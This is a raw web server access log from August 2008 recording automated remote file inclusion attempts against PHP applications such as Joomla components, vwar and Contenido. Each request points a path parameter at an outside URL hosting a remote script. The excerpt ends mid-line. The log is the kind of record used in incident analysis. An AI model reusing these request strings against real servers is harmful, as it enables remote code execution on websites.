70.84.175.98 - - [02/Aug/2008:20:07:20 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
85.126.175.146 - - [02/Aug/2008:20:07:22 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
85.126.175.146 - - [02/Aug/2008:20:07:25 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
86.109.104.39 - - [02/Aug/2008:20:07:35 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
86.109.104.39 - - [02/Aug/2008:20:08:19 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
217.172.161.101 - - [02/Aug/2008:20:09:24 +0200] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
200.131.208.21 - - [02/Aug/2008:20:11:23 +0200] "GET ///vwar/backup/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:20:11:23 +0200] "GET /err-r_log-www.infos.dk%20///vwar/backup/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
216.236.255.134 - - [02/Aug/2008:20:12:54 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
67.15.8.80 - - [02/Aug/2008:20:15:43 +0200] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
67.15.8.80 - - [02/Aug/2008:20:15:52 +0200] "GET /err-r_log-www.infos.dk/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
77.221.130.12 - - [02/Aug/2008:20:16:17 +0200] "GET /index.php?headfoot=yes&path[docroot]=http://www.velvetgold.net/card? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:20:20:24 +0200] "GET /err-r_log-www.infos.dk//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
216.206.238.35 - - [02/Aug/2008:20:20:44 +0200] "GET /board/include/admin.lib.inc.php?site_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
59.188.7.232 - - [02/Aug/2008:20:21:43 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
59.188.7.232 - - [02/Aug/2008:20:21:44 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
77.221.130.12 - - [02/Aug/2008:20:22:31 +0200] "GET /index.php?headfoot=yes&path[docroot]=http://www.velvetgold.net/card? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
202.125.44.70 - - [02/Aug/2008:20:23:51 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
202.125.44.70 - - [02/Aug/2008:20:24:17 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
59.188.7.232 - - [02/Aug/2008:20:24:23 +0200] "GET /err-r_log-www.infos.dk//include/admin.lib.inc.php?site_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
59.188.7.232 - - [02/Aug/2008:20:24:24 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
74.54.21.66 - - [02/Aug/2008:20:24:56 +0200] "GET //vwar/errors.php?error=http://warsector.ru/data/osy.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
74.54.21.66 - - [02/Aug/2008:20:24:57 +0200] "GET /err-r_log-www.infos.dk%20//vwar/errors.php?error=http://warsector.ru/data/osy.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
89.218.85.18 - - [02/Aug/2008:20:26:45 +0200] "GET //appserv/main.php?appserv_root=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
67.15.8.80 - - [02/Aug/2008:20:29:37 +0200] "GET /err-r_log-www.infos.dk%20/newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
70.84.175.98 - - [02/Aug/2008:20:31:49 +0200] "GET /err-r_log-www.infos.dk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
70.84.175.98 - - [02/Aug/2008:20:31:49 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
89.218.85.18 - - [02/Aug/2008:20:33:13 +0200] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
88.214.192.28 - - [02/Aug/2008:20:33:43 +0200] "GET /err-r_log-www.infos.dk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
88.214.192.28 - - [02/Aug/2008:20:33:43 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
216.206.238.35 - - [02/Aug/2008:20:34:07 +0200] "GET /err-r_log-www.infos.dk/board/include/admin.lib.inc.php?site_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
216.206.238.35 - - [02/Aug